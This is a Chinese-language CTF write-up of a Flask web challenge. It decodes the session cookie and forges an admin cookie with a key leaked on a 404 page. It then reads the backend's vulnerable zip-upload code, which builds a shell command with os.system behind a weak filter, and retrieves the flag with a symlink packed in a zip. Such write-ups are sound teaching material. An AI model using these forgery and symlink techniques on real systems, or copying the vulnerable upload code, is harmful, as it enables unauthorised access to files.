上传有个权限,拿admin去登无果,猜测cookie伪造
看到cookie 可以发现是jwt加密的,放到jwt官网解密无果,在网上看到p神的脚本
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
然后就是cookie伪造,github上有个加密脚本
加密脚本
但是加密我们需要他的私钥
之前有个破解工具,去试下
无果,那就找他的key,这题利用到了404页面,学到了
发现访问不存在的目录时会返回key
解密
接着就是如何提权了
观察原来的jwt
可以发现id的值是100,而要提权,类似于linux,将id改为1,利用加密脚本,放到kali下
命令如下
注意一定要用python3的,引文靶机用的是python3
python3 flask_session_cookie_manager3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"
去upload的时候抓包改cookie即可
注意着题的cookie很快就会被删除,需要每次都要更新cookie
查看源代码发现后端代码
分析一波
@app.route('/upload',methods=['GET','POST'])
def upload():
if session['id'] != b'1':
return render_template_string(temp)
if request.method=='POST':
m = hashlib.md5()
name = session['password']
name = name+'qweqweqwe'
name = name.encode(encoding='utf-8')
m.update(name)
md5_one= m.hexdigest()
n = hashlib.md5()
ip = request.remote_addr
ip = ip.encode(encoding='utf-8')
n.update(ip)
md5_ip = n.hexdigest()
f=request.files['file']
basepath=os.path.dirname(os.path.realpath(__file__))
path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
path_base = basepath+'/upload/'+md5_ip+'/'
filename = f.filename
pathname = path+filename
if "zip" != filename.split('.')[-1]:
return 'zip only allowed'
if not os.path.exists(path_base):
try:
os.makedirs(path_base)
except Exception as e:
return 'error'
if not os.path.exists(path):
try:
os.makedirs(path)
except Exception as e:
return 'error'
if not os.path.exists(pathname):
try:
f.save(pathname)
except Exception as e:
return 'error'
try:
cmd = "unzip -n -d "+path+" "+ pathname
if cmd.find('|') != -1 or cmd.find(';') != -1:
waf()
return 'error'
os.system(cmd)
except Exception as e:
return 'error'
unzip_file = zipfile.ZipFile(pathname,'r')
unzip_filename = unzip_file.namelist()[0]
if session['is_login'] != True:
return 'not login'
try:
if unzip_filename.find('/') != -1:
shutil.rmtree(path_base)
os.mkdir(path_base)
return 'error'
image = open(path+unzip_filename, "rb").read()
resp = make_response(image)
resp.headers['Content-Type'] = 'image/png'
return resp
except Exception as e:
shutil.rmtree(path_base)
os.mkdir(path_base)
return 'error'
return render_template('upload.html')
@app.route('/showflag')
def showflag():
if True == False:
image = open(os.path.join('./flag/flag.jpg'), "rb").read()
resp = make_response(image)
resp.headers['Content-Type'] = 'image/png'
return resp
else:
return "can't give you"
分析主要源码
大致意思就是要上传压缩过的图片,然后服务器再进行解压
这个文件上传算是第一次遇到,看了wp
思路就是上传一个软连接压缩包,来读取其他文件
另外通过源码
可以发现flag再showflag这个路由里
linux软连接就相当于windows的快捷方式这个不难理解
去kali创建软连接,再用zip进行压缩
,因为靶机是docker起的所以要用到绝对路径
命令如下
ln -s /proc/self/cwd/flag/flag.jpg forever404
zip -ry forever404.zip forever404
在进行上传
扫一扫
871
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
